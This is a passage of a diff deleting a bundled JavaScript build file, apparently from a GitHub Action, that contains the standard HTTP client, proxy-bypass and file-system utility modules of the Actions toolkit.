value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.HttpClient = exports.isHttps = exports.HttpClientResponse = exports.HttpClientError = exports.getProxyUrl = exports.MediaTypes = exports.Headers = exports.HttpCodes = void 0; -const http = __importStar(__nccwpck_require__(3685)); -const https = __importStar(__nccwpck_require__(5687)); -const pm = __importStar(__nccwpck_require__(9835)); -const tunnel = __importStar(__nccwpck_require__(4294)); -const undici_1 = __nccwpck_require__(1773); -var HttpCodes; -(function (HttpCodes) { - HttpCodes[HttpCodes["OK"] = 200] = "OK"; - HttpCodes[HttpCodes["MultipleChoices"] = 300] = "MultipleChoices"; - HttpCodes[HttpCodes["MovedPermanently"] = 301] = "MovedPermanently"; - HttpCodes[HttpCodes["ResourceMoved"] = 302] = "ResourceMoved"; - HttpCodes[HttpCodes["SeeOther"] = 303] = "SeeOther"; - HttpCodes[HttpCodes["NotModified"] = 304] = "NotModified"; - HttpCodes[HttpCodes["UseProxy"] = 305] = "UseProxy"; - HttpCodes[HttpCodes["SwitchProxy"] = 306] = "SwitchProxy"; - HttpCodes[HttpCodes["TemporaryRedirect"] = 307] = "TemporaryRedirect"; - HttpCodes[HttpCodes["PermanentRedirect"] = 308] = "PermanentRedirect"; - HttpCodes[HttpCodes["BadRequest"] = 400] = "BadRequest"; - HttpCodes[HttpCodes["Unauthorized"] = 401] = "Unauthorized"; - HttpCodes[HttpCodes["PaymentRequired"] = 402] = "PaymentRequired"; - HttpCodes[HttpCodes["Forbidden"] = 403] = "Forbidden"; - HttpCodes[HttpCodes["NotFound"] = 404] = "NotFound"; - 
HttpCodes[HttpCodes["MethodNotAllowed"] = 405] = "MethodNotAllowed"; - HttpCodes[HttpCodes["NotAcceptable"] = 406] = "NotAcceptable"; - HttpCodes[HttpCodes["ProxyAuthenticationRequired"] = 407] = "ProxyAuthenticationRequired"; - HttpCodes[HttpCodes["RequestTimeout"] = 408] = "RequestTimeout"; - HttpCodes[HttpCodes["Conflict"] = 409] = "Conflict"; - HttpCodes[HttpCodes["Gone"] = 410] = "Gone"; - HttpCodes[HttpCodes["TooManyRequests"] = 429] = "TooManyRequests"; - HttpCodes[HttpCodes["InternalServerError"] = 500] = "InternalServerError"; - HttpCodes[HttpCodes["NotImplemented"] = 501] = "NotImplemented"; - HttpCodes[HttpCodes["BadGateway"] = 502] = "BadGateway"; - HttpCodes[HttpCodes["ServiceUnavailable"] = 503] = "ServiceUnavailable"; - HttpCodes[HttpCodes["GatewayTimeout"] = 504] = "GatewayTimeout"; -})(HttpCodes || (exports.HttpCodes = HttpCodes = {})); -var Headers; -(function (Headers) { - Headers["Accept"] = "accept"; - Headers["ContentType"] = "content-type"; -})(Headers || (exports.Headers = Headers = {})); -var MediaTypes; -(function (MediaTypes) { - MediaTypes["ApplicationJson"] = "application/json"; -})(MediaTypes || (exports.MediaTypes = MediaTypes = {})); -/** - * Returns the proxy URL, depending upon the supplied url and proxy environment variables. - * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com - */ -function getProxyUrl(serverUrl) { - const proxyUrl = pm.getProxyUrl(new URL(serverUrl)); - return proxyUrl ? 
proxyUrl.href : ''; -} -exports.getProxyUrl = getProxyUrl; -const HttpRedirectCodes = [ - HttpCodes.MovedPermanently, - HttpCodes.ResourceMoved, - HttpCodes.SeeOther, - HttpCodes.TemporaryRedirect, - HttpCodes.PermanentRedirect -]; -const HttpResponseRetryCodes = [ - HttpCodes.BadGateway, - HttpCodes.ServiceUnavailable, - HttpCodes.GatewayTimeout -]; -const RetryableHttpVerbs = ['OPTIONS', 'GET', 'DELETE', 'HEAD']; -const ExponentialBackoffCeiling = 10; -const ExponentialBackoffTimeSlice = 5; -class HttpClientError extends Error { - constructor(message, statusCode) { - super(message); - this.name = 'HttpClientError'; - this.statusCode = statusCode; - Object.setPrototypeOf(this, HttpClientError.prototype); - } -} -exports.HttpClientError = HttpClientError; -class HttpClientResponse { - constructor(message) { - this.message = message; - } - readBody() { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { - let output = Buffer.alloc(0); - this.message.on('data', (chunk) => { - output = Buffer.concat([output, chunk]); - }); - this.message.on('end', () => { - resolve(output.toString()); - }); - })); - }); - } - readBodyBuffer() { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { - const chunks = []; - this.message.on('data', (chunk) => { - chunks.push(chunk); - }); - this.message.on('end', () => { - resolve(Buffer.concat(chunks)); - }); - })); - }); - } -} -exports.HttpClientResponse = HttpClientResponse; -function isHttps(requestUrl) { - const parsedUrl = new URL(requestUrl); - return parsedUrl.protocol === 'https:'; -} -exports.isHttps = isHttps; -class HttpClient { - constructor(userAgent, handlers, requestOptions) { - this._ignoreSslError = false; - this._allowRedirects = true; - this._allowRedirectDowngrade = false; - this._maxRedirects = 50; - this._allowRetries = false; - this._maxRetries = 1; 
- this._keepAlive = false; - this._disposed = false; - this.userAgent = userAgent; - this.handlers = handlers || []; - this.requestOptions = requestOptions; - if (requestOptions) { - if (requestOptions.ignoreSslError != null) { - this._ignoreSslError = requestOptions.ignoreSslError; - } - this._socketTimeout = requestOptions.socketTimeout; - if (requestOptions.allowRedirects != null) { - this._allowRedirects = requestOptions.allowRedirects; - } - if (requestOptions.allowRedirectDowngrade != null) { - this._allowRedirectDowngrade = requestOptions.allowRedirectDowngrade; - } - if (requestOptions.maxRedirects != null) { - this._maxRedirects = Math.max(requestOptions.maxRedirects, 0); - } - if (requestOptions.keepAlive != null) { - this._keepAlive = requestOptions.keepAlive; - } - if (requestOptions.allowRetries != null) { - this._allowRetries = requestOptions.allowRetries; - } - if (requestOptions.maxRetries != null) { - this._maxRetries = requestOptions.maxRetries; - } - } - } - options(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('OPTIONS', requestUrl, null, additionalHeaders || {}); - }); - } - get(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('GET', requestUrl, null, additionalHeaders || {}); - }); - } - del(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('DELETE', requestUrl, null, additionalHeaders || {}); - }); - } - post(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('POST', requestUrl, data, additionalHeaders || {}); - }); - } - patch(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('PATCH', requestUrl, data, additionalHeaders || {}); - }); - } - put(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, 
function* () { - return this.request('PUT', requestUrl, data, additionalHeaders || {}); - }); - } - head(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('HEAD', requestUrl, null, additionalHeaders || {}); - }); - } - sendStream(verb, requestUrl, stream, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request(verb, requestUrl, stream, additionalHeaders); - }); - } - /** - * Gets a typed object from an endpoint - * Be aware that not found returns a null. Other errors (4xx, 5xx) reject the promise - */ - getJson(requestUrl, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - const res = yield this.get(requestUrl, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - postJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = yield this.post(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - putJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = 
yield this.put(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - patchJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = yield this.patch(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - /** - * Makes a raw http request. - * All other methods such as get, post, patch, and request ultimately call this. - * Prefer get, del, post and patch - */ - request(verb, requestUrl, data, headers) { - return __awaiter(this, void 0, void 0, function* () { - if (this._disposed) { - throw new Error('Client has already been disposed.'); - } - const parsedUrl = new URL(requestUrl); - let info = this._prepareRequest(verb, parsedUrl, headers); - // Only perform retries on reads since writes may not be idempotent. - const maxTries = this._allowRetries && RetryableHttpVerbs.includes(verb) - ? this._maxRetries + 1 - : 1; - let numTries = 0; - let response; - do { - response = yield this.requestRaw(info, data); - // Check if it's an authentication challenge - if (response && - response.message && - response.message.statusCode === HttpCodes.Unauthorized) { - let authenticationHandler; - for (const handler of this.handlers) { - if (handler.canHandleAuthentication(response)) { - authenticationHandler = handler; - break; - } - } - if (authenticationHandler) { - return authenticationHandler.handleAuthentication(this, info, data); - } - else { - // We have received an unauthorized response but have no handlers to handle it. - // Let the response return to the caller. 
- return response; - } - } - let redirectsRemaining = this._maxRedirects; - while (response.message.statusCode && - HttpRedirectCodes.includes(response.message.statusCode) && - this._allowRedirects && - redirectsRemaining > 0) { - const redirectUrl = response.message.headers['location']; - if (!redirectUrl) { - // if there's no location to redirect to, we won't - break; - } - const parsedRedirectUrl = new URL(redirectUrl); - if (parsedUrl.protocol === 'https:' && - parsedUrl.protocol !== parsedRedirectUrl.protocol && - !this._allowRedirectDowngrade) { - throw new Error('Redirect from HTTPS to HTTP protocol. This downgrade is not allowed for security reasons. If you want to allow this behavior, set the allowRedirectDowngrade option to true.'); - } - // we need to finish reading the response before reassigning response - // which will leak the open socket. - yield response.readBody(); - // strip authorization header if redirected to a different hostname - if (parsedRedirectUrl.hostname !== parsedUrl.hostname) { - for (const header in headers) { - // header names are case insensitive - if (header.toLowerCase() === 'authorization') { - delete headers[header]; - } - } - } - // let's make the request with the new redirectUrl - info = this._prepareRequest(verb, parsedRedirectUrl, headers); - response = yield this.requestRaw(info, data); - redirectsRemaining--; - } - if (!response.message.statusCode || - !HttpResponseRetryCodes.includes(response.message.statusCode)) { - // If not a retry code, return immediately instead of retrying - return response; - } - numTries += 1; - if (numTries < maxTries) { - yield response.readBody(); - yield this._performExponentialBackoff(numTries); - } - } while (numTries < maxTries); - return response; - }); - } - /** - * Needs to be called if keepAlive is set to true in request options. - */ - dispose() { - if (this._agent) { - this._agent.destroy(); - } - this._disposed = true; - } - /** - * Raw request. 
- * @param info - * @param data - */ - requestRaw(info, data) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve, reject) => { - function callbackForResult(err, res) { - if (err) { - reject(err); - } - else if (!res) { - // If `err` is not passed, then `res` must be passed. - reject(new Error('Unknown error')); - } - else { - resolve(res); - } - } - this.requestRawWithCallback(info, data, callbackForResult); - }); - }); - } - /** - * Raw request with callback. - * @param info - * @param data - * @param onResult - */ - requestRawWithCallback(info, data, onResult) { - if (typeof data === 'string') { - if (!info.options.headers) { - info.options.headers = {}; - } - info.options.headers['Content-Length'] = Buffer.byteLength(data, 'utf8'); - } - let callbackCalled = false; - function handleResult(err, res) { - if (!callbackCalled) { - callbackCalled = true; - onResult(err, res); - } - } - const req = info.httpModule.request(info.options, (msg) => { - const res = new HttpClientResponse(msg); - handleResult(undefined, res); - }); - let socket; - req.on('socket', sock => { - socket = sock; - }); - // If we ever get disconnected, we want the socket to timeout eventually - req.setTimeout(this._socketTimeout || 3 * 60000, () => { - if (socket) { - socket.end(); - } - handleResult(new Error(`Request timeout: ${info.options.path}`)); - }); - req.on('error', function (err) { - // err has statusCode property - // res should have headers - handleResult(err); - }); - if (data && typeof data === 'string') { - req.write(data, 'utf8'); - } - if (data && typeof data !== 'string') { - data.on('close', function () { - req.end(); - }); - data.pipe(req); - } - else { - req.end(); - } - } - /** - * Gets an http agent. This function is useful when you need an http agent that handles - * routing through a proxy server - depending upon the url and proxy environment variables. - * @param serverUrl The server URL where the request will be sent. 
For example, https://api.github.com - */ - getAgent(serverUrl) { - const parsedUrl = new URL(serverUrl); - return this._getAgent(parsedUrl); - } - getAgentDispatcher(serverUrl) { - const parsedUrl = new URL(serverUrl); - const proxyUrl = pm.getProxyUrl(parsedUrl); - const useProxy = proxyUrl && proxyUrl.hostname; - if (!useProxy) { - return; - } - return this._getProxyAgentDispatcher(parsedUrl, proxyUrl); - } - _prepareRequest(method, requestUrl, headers) { - const info = {}; - info.parsedUrl = requestUrl; - const usingSsl = info.parsedUrl.protocol === 'https:'; - info.httpModule = usingSsl ? https : http; - const defaultPort = usingSsl ? 443 : 80; - info.options = {}; - info.options.host = info.parsedUrl.hostname; - info.options.port = info.parsedUrl.port - ? parseInt(info.parsedUrl.port) - : defaultPort; - info.options.path = - (info.parsedUrl.pathname || '') + (info.parsedUrl.search || ''); - info.options.method = method; - info.options.headers = this._mergeHeaders(headers); - if (this.userAgent != null) { - info.options.headers['user-agent'] = this.userAgent; - } - info.options.agent = this._getAgent(info.parsedUrl); - // gives handlers an opportunity to participate - if (this.handlers) { - for (const handler of this.handlers) { - handler.prepareRequest(info.options); - } - } - return info; - } - _mergeHeaders(headers) { - if (this.requestOptions && this.requestOptions.headers) { - return Object.assign({}, lowercaseKeys(this.requestOptions.headers), lowercaseKeys(headers || {})); - } - return lowercaseKeys(headers || {}); - } - _getExistingOrDefaultHeader(additionalHeaders, header, _default) { - let clientHeader; - if (this.requestOptions && this.requestOptions.headers) { - clientHeader = lowercaseKeys(this.requestOptions.headers)[header]; - } - return additionalHeaders[header] || clientHeader || _default; - } - _getAgent(parsedUrl) { - let agent; - const proxyUrl = pm.getProxyUrl(parsedUrl); - const useProxy = proxyUrl && proxyUrl.hostname; - if 
(this._keepAlive && useProxy) { - agent = this._proxyAgent; - } - if (this._keepAlive && !useProxy) { - agent = this._agent; - } - // if agent is already assigned use that agent. - if (agent) { - return agent; - } - const usingSsl = parsedUrl.protocol === 'https:'; - let maxSockets = 100; - if (this.requestOptions) { - maxSockets = this.requestOptions.maxSockets || http.globalAgent.maxSockets; - } - // This is `useProxy` again, but we need to check `proxyURl` directly for TypeScripts's flow analysis. - if (proxyUrl && proxyUrl.hostname) { - const agentOptions = { - maxSockets, - keepAlive: this._keepAlive, - proxy: Object.assign(Object.assign({}, ((proxyUrl.username || proxyUrl.password) && { - proxyAuth: `${proxyUrl.username}:${proxyUrl.password}` - })), { host: proxyUrl.hostname, port: proxyUrl.port }) - }; - let tunnelAgent; - const overHttps = proxyUrl.protocol === 'https:'; - if (usingSsl) { - tunnelAgent = overHttps ? tunnel.httpsOverHttps : tunnel.httpsOverHttp; - } - else { - tunnelAgent = overHttps ? tunnel.httpOverHttps : tunnel.httpOverHttp; - } - agent = tunnelAgent(agentOptions); - this._proxyAgent = agent; - } - // if reusing agent across request and tunneling agent isn't assigned create a new agent - if (this._keepAlive && !agent) { - const options = { keepAlive: this._keepAlive, maxSockets }; - agent = usingSsl ? new https.Agent(options) : new http.Agent(options); - this._agent = agent; - } - // if not using private agent and tunnel agent isn't setup then use global agent - if (!agent) { - agent = usingSsl ? 
https.globalAgent : http.globalAgent; - } - if (usingSsl && this._ignoreSslError) { - // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process - // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options - // we have to cast it to any and change it directly - agent.options = Object.assign(agent.options || {}, { - rejectUnauthorized: false - }); - } - return agent; - } - _getProxyAgentDispatcher(parsedUrl, proxyUrl) { - let proxyAgent; - if (this._keepAlive) { - proxyAgent = this._proxyAgentDispatcher; - } - // if agent is already assigned use that agent. - if (proxyAgent) { - return proxyAgent; - } - const usingSsl = parsedUrl.protocol === 'https:'; - proxyAgent = new undici_1.ProxyAgent(Object.assign({ uri: proxyUrl.href, pipelining: !this._keepAlive ? 0 : 1 }, ((proxyUrl.username || proxyUrl.password) && { - token: `${proxyUrl.username}:${proxyUrl.password}` - }))); - this._proxyAgentDispatcher = proxyAgent; - if (usingSsl && this._ignoreSslError) { - // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process - // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options - // we have to cast it to any and change it directly - proxyAgent.options = Object.assign(proxyAgent.options.requestTls || {}, { - rejectUnauthorized: false - }); - } - return proxyAgent; - } - _performExponentialBackoff(retryNumber) { - return __awaiter(this, void 0, void 0, function* () { - retryNumber = Math.min(ExponentialBackoffCeiling, retryNumber); - const ms = ExponentialBackoffTimeSlice * Math.pow(2, retryNumber); - return new Promise(resolve => setTimeout(() => resolve(), ms)); - }); - } - _processResponse(res, options) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { - const statusCode = res.message.statusCode || 0; - const response = { - statusCode, 
- result: null, - headers: {} - }; - // not found leads to null obj returned - if (statusCode === HttpCodes.NotFound) { - resolve(response); - } - // get the result from the body - function dateTimeDeserializer(key, value) { - if (typeof value === 'string') { - const a = new Date(value); - if (!isNaN(a.valueOf())) { - return a; - } - } - return value; - } - let obj; - let contents; - try { - contents = yield res.readBody(); - if (contents && contents.length > 0) { - if (options && options.deserializeDates) { - obj = JSON.parse(contents, dateTimeDeserializer); - } - else { - obj = JSON.parse(contents); - } - response.result = obj; - } - response.headers = res.message.headers; - } - catch (err) { - // Invalid resource (contents not json); leaving result obj null - } - // note that 3xx redirects are handled by the http layer. - if (statusCode > 299) { - let msg; - // if exception/error in body, attempt to get better error - if (obj && obj.message) { - msg = obj.message; - } - else if (contents && contents.length > 0) { - // it may be the case that the exception is in the body message as string - msg = contents; - } - else { - msg = `Failed request: (${statusCode})`; - } - const err = new HttpClientError(msg, statusCode); - err.result = response.result; - reject(err); - } - else { - resolve(response); - } - })); - }); - } -} -exports.HttpClient = HttpClient; -const lowercaseKeys = (obj) => Object.keys(obj).reduce((c, k) => ((c[k.toLowerCase()] = obj[k]), c), {}); -//# sourceMappingURL=index.js.map - -/***/ }), - -/***/ 9835: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.checkBypass = exports.getProxyUrl = void 0; -function getProxyUrl(reqUrl) { - const usingSsl = reqUrl.protocol === 'https:'; - if (checkBypass(reqUrl)) { - return undefined; - } - const proxyVar = (() => { - if (usingSsl) { - return process.env['https_proxy'] || process.env['HTTPS_PROXY']; - } - else { - 
return process.env['http_proxy'] || process.env['HTTP_PROXY']; - } - })(); - if (proxyVar) { - try { - return new URL(proxyVar); - } - catch (_a) { - if (!proxyVar.startsWith('http://') && !proxyVar.startsWith('https://')) - return new URL(`http://${proxyVar}`); - } - } - else { - return undefined; - } -} -exports.getProxyUrl = getProxyUrl; -function checkBypass(reqUrl) { - if (!reqUrl.hostname) { - return false; - } - const reqHost = reqUrl.hostname; - if (isLoopbackAddress(reqHost)) { - return true; - } - const noProxy = process.env['no_proxy'] || process.env['NO_PROXY'] || ''; - if (!noProxy) { - return false; - } - // Determine the request port - let reqPort; - if (reqUrl.port) { - reqPort = Number(reqUrl.port); - } - else if (reqUrl.protocol === 'http:') { - reqPort = 80; - } - else if (reqUrl.protocol === 'https:') { - reqPort = 443; - } - // Format the request hostname and hostname with port - const upperReqHosts = [reqUrl.hostname.toUpperCase()]; - if (typeof reqPort === 'number') { - upperReqHosts.push(`${upperReqHosts[0]}:${reqPort}`); - } - // Compare request host against noproxy - for (const upperNoProxyItem of noProxy - .split(',') - .map(x => x.trim().toUpperCase()) - .filter(x => x)) { - if (upperNoProxyItem === '*' || - upperReqHosts.some(x => x === upperNoProxyItem || - x.endsWith(`.${upperNoProxyItem}`) || - (upperNoProxyItem.startsWith('.') && - x.endsWith(`${upperNoProxyItem}`)))) { - return true; - } - } - return false; -} -exports.checkBypass = checkBypass; -function isLoopbackAddress(host) { - const hostLower = host.toLowerCase(); - return (hostLower === 'localhost' || - hostLower.startsWith('127.') || - hostLower.startsWith('[::1]') || - hostLower.startsWith('[0:0:0:0:0:0:0:1]')); -} -//# sourceMappingURL=proxy.js.map - -/***/ }), - -/***/ 1962: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -var _a; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getCmdPath = exports.tryGetExecutablePath = exports.isRooted = exports.isDirectory = exports.exists = exports.READONLY = exports.UV_FS_O_EXLOCK = exports.IS_WINDOWS = exports.unlink = exports.symlink = exports.stat = exports.rmdir = exports.rm = exports.rename = exports.readlink = exports.readdir = exports.open = exports.mkdir = exports.lstat = exports.copyFile = exports.chmod = void 0; -const fs = __importStar(__nccwpck_require__(7147)); -const path = __importStar(__nccwpck_require__(1017)); -_a = fs.promises -// export const {open} = 'fs' -, exports.chmod = _a.chmod, exports.copyFile = _a.copyFile, exports.lstat = _a.lstat, exports.mkdir = _a.mkdir, exports.open = _a.open, exports.readdir = _a.readdir, exports.readlink = _a.readlink, exports.rename = _a.rename, exports.rm = _a.rm, exports.rmdir = _a.rmdir, exports.stat = _a.stat, exports.symlink = _a.symlink, exports.unlink = _a.unlink; -// export const {open} = 'fs' -exports.IS_WINDOWS = process.platform === 'win32'; -// See https://github.com/nodejs/node/blob/d0153aee367422d0858105abec186da4dff0a0c5/deps/uv/include/uv/win.h#L691 -exports.UV_FS_O_EXLOCK = 0x10000000; -exports.READONLY = fs.constants.O_RDONLY; -function exists(fsPath) { - return __awaiter(this, void 0, void 0, function* () { - try { - yield exports.stat(fsPath); - } - catch (err) { - if (err.code === 'ENOENT') { - return false; - } - throw err; - } - return true; - }); -} -exports.exists = exists; -function isDirectory(fsPath, useStat = false) { - return __awaiter(this, void 0, void 0, function* () { - const stats = useStat ? yield exports.stat(fsPath) : yield exports.lstat(fsPath); - return stats.isDirectory(); - }); -} -exports.isDirectory = isDirectory; -/** - * On OSX/Linux, true if path starts with '/'. 
On Windows, true for paths like: - * \, \hello, \\hello\share, C:, and C:\hello (and corresponding alternate separator cases). - */ -function isRooted(p) { - p = normalizeSeparators(p); - if (!p) { - throw new Error('isRooted() parameter "p" cannot be empty'); - } - if (exports.IS_WINDOWS) { - return (p.startsWith('\\') || /^[A-Z]:/i.test(p) // e.g. \ or \hello or \\hello - ); // e.g. C: or C:\hello - } - return p.startsWith('/'); -} -exports.isRooted = isRooted; -/** - * Best effort attempt to determine whether a file exists and is executable. - * @param filePath file path to check - * @param extensions additional file extensions to try - * @return if file exists and is executable, returns the file path. otherwise empty string. - */ -function tryGetExecutablePath(filePath, extensions) { - return __awaiter(this, void 0, void 0, function* () { - let stats = undefined; - try { - // test file exists - stats = yield exports.stat(filePath); - } - catch (err) { - if (err.code !== 'ENOENT') { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); - } - } - if (stats && stats.isFile()) { - if (exports.IS_WINDOWS) { - // on Windows, test for valid extension - const upperExt = path.extname(filePath).toUpperCase(); - if (extensions.some(validExt => validExt.toUpperCase() === upperExt)) { - return filePath; - } - } - else { - if (isUnixExecutable(stats)) { - return filePath; - } - } - } - // try each extension - const originalFilePath = filePath; - for (const extension of extensions) { - filePath = originalFilePath + extension; - stats = undefined; - try { - stats = yield exports.stat(filePath); - } - catch (err) { - if (err.code !== 'ENOENT') { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); - } - } - if (stats && stats.isFile()) { - if (exports.IS_WINDOWS) { - // preserve the case of 
the actual file (since an extension was appended) - try { - const directory = path.dirname(filePath); - const upperName = path.basename(filePath).toUpperCase(); - for (const actualName of yield exports.readdir(directory)) { - if (upperName === actualName.toUpperCase()) { - filePath = path.join(directory, actualName); - break; - } - } - } - catch (err) { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine the actual case of the file '${filePath}': ${err}`); - } - return filePath; - } - else { - if (isUnixExecutable(stats)) { - return filePath; - } - } - } - } - return ''; - }); -} -exports.tryGetExecutablePath = tryGetExecutablePath; -function normalizeSeparators(p) { - p = p || ''; - if (exports.IS_WINDOWS) { - // convert slashes on Windows - p = p.replace(/\//g, '\\'); - // remove redundant slashes - return p.replace(/\\\\+/g, '\\'); - } - // remove redundant slashes - return p.replace(/\/\/+/g, '/'); -} -// on Mac/Linux, test the execute bit -// R W X R W X R W X -// 256 128 64 32 16 8 4 2 1 -function isUnixExecutable(stats) { - return ((stats.mode & 1) > 0 || - ((stats.mode & 8) > 0 && stats.gid === process.getgid()) || - ((stats.mode & 64) > 0 && stats.uid === process.getuid())); -} -// Get the path of cmd.exe in windows -function getCmdPath() { - var _a; - return (_a = process.env['COMSPEC']) !== null && _a !== void 0 ? _a : `cmd.exe`; -} -exports.getCmdPath = getCmdPath; -//# sourceMappingURL=io-util.js.map - -/***/ }), - -/***/ 7436: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.findInPath = exports.which = exports.mkdirP = exports.rmRF = exports.mv = exports.cp = void 0; -const assert_1 = __nccwpck_require__(9491); -const path = __importStar(__nccwpck_require__(1017)); -const ioUtil = __importStar(__nccwpck_require__(1962)); -/** - * Copies a file or folder. - * Based off of shelljs - https://github.com/shelljs/shelljs/blob/9237f66c52e5daa40458f94f9565e18e8132f5a6/src/cp.js - * - * @param source source path - * @param dest destination path - * @param options optional. See CopyOptions. - */ -function cp(source, dest, options = {}) { - return __awaiter(this, void 0, void 0, function* () { - const { force, recursive, copySourceDirectory } = readCopyOptions(options); - const destStat = (yield ioUtil.exists(dest)) ? 
